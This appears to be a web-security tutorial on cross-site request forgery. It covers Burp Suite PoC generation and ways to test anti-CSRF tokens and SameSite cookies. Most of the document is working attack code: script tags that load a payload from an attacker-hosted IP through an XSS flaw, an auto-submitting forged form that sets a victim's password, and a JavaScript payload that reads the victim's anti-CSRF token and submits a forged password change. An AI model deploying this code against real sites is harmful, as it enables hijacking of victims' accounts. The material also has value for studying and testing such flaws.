CSRF (Cross Site Request Forgery)


  1. CSRF (Cross Site Request Forgery): -
    1. Precondition: the victim must be logged in to the target site, i.e. hold an active session cookie that the browser will send automatically.
    2. Password change form example: -
      1. How this attack happens: -
        1. Attacker captures the change-password request from his own account and builds a page that replays it (same method, URL and parameters, with the new password of his choosing).
        2. Attacker sends the page or a link to it to the victim.
        3. Victim is logged in to the target site with an active session.
        4. Victim opens the malicious link or PoC sent by the attacker.
        5. Victim's browser automatically attaches the victim's session cookies to the cross-site request; the attacker never needs to see them.
        6. The server trusts the session cookie and changes the victim's password.
      2. Demo (Burp Suite Professional): -
        1. Attacker: capture the change-password request in Burp (Proxy HTTP history).
        2. Create a CSRF PoC: -
          1. Right click on the request.
          2. Engagement tools.
          3. Generate CSRF PoC.
          4. Change the password parameter to the value you want to set.
          5. Save the PoC as ".html". Eg: csrf.html
          6. Victim should be logged in with an active session.
          7. Victim opens the CSRF PoC "csrf.html".
          8. Victim clicks the submit button (or the PoC auto-submits the form with JavaScript, so no click is needed).
          9. Password is changed.
          10. Check before sending: a plain HTML form can only reproduce GET/POST requests with a urlencoded or multipart body and no custom headers. If the application requires a JSON body or a custom request header, the generated form PoC will not match the original request.
    3. Sometimes anti-CSRF tokens are implemented to mitigate this attack.
      1. Check whether the CSRF token changes (per session or per request) or is a static value.
      2. Check whether a CSRF header (e.g. X-CSRF-Token) is sent with the request and actually validated by the server.
      3. Tokens cannot be bypassed if implemented properly: the attacker's page runs in a different origin, so the same-origin policy prevents it from reading the victim's token, and a forged request without the correct token is rejected. Things to test, because implementations are often wrong: whether the request is still accepted when the token parameter is removed entirely, whether a token taken from the attacker's own session is accepted for the victim's session, and whether the same action also works over GET without the token. Also check the session cookie's SameSite attribute: modern browsers treat cookies without one as Lax by default, which blocks the cookie on a cross-site POST and can make a form PoC fail even without a token.
        1. Still, XSS + CSRF can make the attack work, because script injected into the vulnerable site runs in that site's origin and can read the token.
          1. Find an XSS vulnerability in the target site.
          2. Start a web server and serve the CSRF page/script from it.
            1. You need to serve csrf3-2-2.js.
            2. https://github.com/appingmap/CSRF (csrf.js is available at this link).
            3. Use this as the XSS payload: -
            4. <script src="http://192.168.1.128/csrf3-2-2.js"></script>
            5. <script src=http://192.168.1.128/csrf3-2-2.js></script>
            6. Either of the two payloads above (4 or 5) will work. 192.168.1.128 is your server's IP.
          3. When you enter this script in the XSS-vulnerable parameter, the victim's browser loads the script from your server.
          4. "csrf3-2-2.js" executes in the victim's browser within the vulnerable site's origin (not on the server). It contains the CSRF PoC and first requests the page that carries the CSRF token.
          5. Because the script runs in the same origin as the target, it can read the token from that response and include it in the forged request.
          6. Session cookies are attached automatically and the CSRF attack goes through.
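The following is an added example (not part of the original notes and not Burp's own code) showing what the "Generate CSRF PoC" step above produces: it turns a captured change-password request into an auto-submitting HTML page, with parameter values HTML-escaped so a quote in the password cannot break the form. The target URL, the parameter names and the password value are assumptions for illustration. Run it with Node to print the csrf.html contents.

```javascript
// Added example, not from the original notes: build a CSRF PoC page from a
// captured request, the same kind of page Burp's "Generate CSRF PoC" writes.
// URL, parameter names and values below are assumed for illustration.

// Escape text for safe placement inside an HTML attribute or text node, so a
// password containing quotes or angle brackets cannot break out of the form.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// req = { method, url, params } copied from the captured request.
// Returns the HTML of the PoC page the victim will open (csrf.html).
// A plain form only reproduces GET/POST with a urlencoded body; anything else
// (PUT/DELETE, JSON bodies, custom headers) needs a script-based PoC instead.
function buildCsrfPoc(req, autoSubmit = true) {
  const method = req.method.toUpperCase();
  if (method !== 'GET' && method !== 'POST') {
    throw new Error('HTML forms can only send GET or POST, not ' + method);
  }
  const inputs = Object.entries(req.params)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join('\n');
  // With autoSubmit the request fires as soon as the page loads (no click by the victim).
  const submit = autoSubmit ? '  <script>document.forms[0].submit();</script>' : '';
  return [
    '<html>',
    '<body>',
    `  <form action="${escapeHtml(req.url)}" method="${method}">`,
    inputs,
    '    <input type="submit" value="Submit request">',
    '  </form>',
    submit,
    '</body>',
    '</html>',
  ].filter(line => line !== '').join('\n');
}

// Constructed sample of a captured change-password request (values are made up).
const capturedRequest = {
  method: 'POST',
  url: 'http://target.example/account/change-password',
  params: { new_password: 'Attacker123!', confirm_password: 'Attacker123!' },
};

// Print the PoC; redirect stdout to csrf.html to get the file used in the demo.
const pocHtml = buildCsrfPoc(capturedRequest);
console.log(pocHtml);
```

The `autoSubmit` variant is what makes step 8 of the demo (the victim clicking submit) unnecessary; pass `false` to get the click-to-submit form instead. If the captured request was multipart, add `enctype="multipart/form-data"` to the form tag; if it carried a JSON body or a custom header, a form cannot reproduce it and the token/SameSite checks above apply.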
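The following is an added example of the XSS + CSRF chain described in the last block; it is written here for illustration and is not the csrf3-2-2.js / csrf.js from the linked repository. It is the script the `<script src=...>` XSS payload would load: because it runs in the victim's browser inside the vulnerable site's origin, `fetch` with `credentials: 'same-origin'` sends the victim's session cookie, the response HTML can be read, and the anti-CSRF token is pulled out of the form and sent back with the forged password change. The form path, the token field name and the password parameter names are assumptions. The parsing and body-building parts are pure functions, so they can be exercised offline in Node on the constructed sample HTML at the bottom.

```javascript
// Added example, not the script from the linked repository: the payload the
// XSS loads. It fetches the change-password page in the victim's session,
// extracts the anti-CSRF token, and submits the forged request with it.
// Paths, field names and the password value are assumptions for illustration.

const TARGET = {
  formPath: '/account/change-password', // assumed: page that contains the form and the token
  tokenField: 'csrf',                   // assumed: name of the hidden token input
  newPassword: 'Attacker123!',          // password the attacker wants to set
};

// Return the value of the <input> whose name attribute equals fieldName, or null.
// Handles any attribute order and single- or double-quoted attribute values.
function extractCsrfToken(html, fieldName) {
  const inputTag = /<input\b[^>]*>/gi;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let tag;
  while ((tag = inputTag.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(tag[0])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    if (attrs.name === fieldName && attrs.value !== undefined) return attrs.value;
  }
  return null;
}

// Build the urlencoded body of the forged request, token included.
function buildChangePasswordBody(token, newPassword, tokenField) {
  const body = new URLSearchParams();
  body.set(tokenField, token);
  body.set('new_password', newPassword);
  body.set('confirm_password', newPassword);
  return body.toString();
}

// Browser entry point. Same-origin fetch attaches the victim's session cookie
// and, unlike a cross-site page, is allowed to read the response body.
async function runXssCsrfChain(cfg = TARGET) {
  const page = await fetch(cfg.formPath, { credentials: 'same-origin' });
  const token = extractCsrfToken(await page.text(), cfg.tokenField);
  if (token === null) throw new Error('token field ' + cfg.tokenField + ' not found in form');
  const res = await fetch(cfg.formPath, {
    method: 'POST',
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildChangePasswordBody(token, cfg.newPassword, cfg.tokenField),
  });
  return res.status;
}

// Constructed sample of the change-password form (not taken from any real site),
// used to exercise the token parser offline.
const SAMPLE_FORM_HTML = `
<form method="post" action="/account/change-password">
  <input value="a1b2c3d4e5f6" type="hidden" name='csrf'>
  <input type="password" name="new_password">
  <input type="password" name="confirm_password">
  <input type="submit" value="Change">
</form>`;

// Only run the live chain when loaded in a browser via the XSS payload.
if (typeof window !== 'undefined') {
  runXssCsrfChain().then(status => console.log('password change returned HTTP', status));
} else {
  console.log('offline check, token from sample form:', extractCsrfToken(SAMPLE_FORM_HTML, 'csrf'));
}
```

This is exactly why a per-session token does not help once the site has an XSS: the token is designed to be unreadable from another origin, but the injected script is not in another origin. If the application instead expects the token in a header, send it with the same `fetch` call in the `headers` object.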